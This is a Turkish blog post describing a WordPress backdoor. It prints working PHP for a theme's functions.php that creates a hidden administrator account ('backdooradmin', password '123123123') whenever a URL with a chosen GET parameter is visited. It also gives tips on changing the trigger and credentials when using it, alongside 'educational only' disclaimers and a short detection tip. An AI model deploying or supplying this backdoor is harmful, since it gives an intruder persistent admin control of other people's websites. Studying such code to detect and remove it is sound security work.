Bugün sizlere wordpress backdoor ile wordpress sitelerine backdoor (arka kapı) olarak yeni admin eklemeden bahsedeceğim.

Yönettiğim bir wordpress sitesinde güvenlik denetimi yaparken hiç alışık olmadığım bir kod ile karşılaştım. Bu kodu detaylıca araştırırken gönderdiği girdi ile yeni bir admin oluşturduğunu fark ettim. Bu bahsettiğim kod firefox, chrome gibi normal bir web tarayıcısını kullanarak belirli bir url’ye erişiyor ve tetiklenmesi ile çok basit ama güçlü bir php betiği olduğunu farkettim.

WordPress backdoor tetiklendikten sonra, websitesinde kötü niyetli bir kullanıcının istediği zaman wordpress kurulumuna yeniden erişebilir, yönetici rolüne sahip yeni bir wordpress kullanıcısını otomatik olarak oluşturabilir. Bu yazıda backdoor oluşturan koda bir göz atacağız ve nasıl çalıştığını anlatacağım.

NOT*** : Bu makale SADECE eğitim amaçlıdır. Aslında kimsenin wordpress kurulumunda böyle bir bacdoor (arka kapı) kullanmasını önermiyorum.

WordPress Backdoor

WordPress backdoor aşağıdaki örnekte yer almaktadır. WordPress temasının function.php dosyasına eklenebilen basit bir PHP işlevidir.

<?php
add_action('wp_head', 'WordPress_backdoor');
 
function WordPress_backdoor() {
    If ($_GET['arka'] == 'kapi') {
        require('wp-includes/registration.php');
        If (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', '123123123');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

WordPress Backdoor, https://veomer.com?arka=kapi URL’sine erişerek tetiklenebilir ( veomer.com sitesinin function.php dosyasına üstte yer alan kod eklenmişse – Denemeyin eklemedim 🙂 .. )

 

WordPress Backdoor Nasıl Çalışır ?

Yukarıdaki örneği kullanarak, wordpress backdoor tetiklendiğinde, aşağıdaki bilgiler ile yeni bir wordpress yönetici hesabı oluşturur:

Kullanıcı Adı : backdooradmin

Şifre : 123123123

 

WordPress Backdooru Kullanma

Herhangi bir nedenden dolayı wordpress backdooru kullanmak isterseniz eğer yukarıdaki örnekte belirtilenlerden farklı bir URL kullanın. ( GET değişkenini 5.satırdaki değeri değiştirerek ve ayrıca güçlü bir kullanıcı adı, şifre kullanın onu da 8.satırdaki bilgileri kullanarak..

NOT*** : Tekrar belirtmek isterim ki bu backdoor kullanmanızı önermiyorum. Bu bilgileri sadece eğitim ve güvenlik amaçlı paylaşıyorum. Birinin böyle bir backdoor oluşturması için wordpress dosyalarınızda editleme yetkisi olması lazım. Genellikle ftp bilgileri ile bu girişim yapılabilir. Herhangi bir güvenlik tehdidi ile karşı karşıya iseniz tema dosyanızın içerisinde yer alan function.php dosyasını kontrol etmeyi unutmayınız !

WordPress güvenliği konusunda profesyonel desteğe ihtiyacınız varsa : omer@vegory.com adresinden bana ulaşabilirsiniz.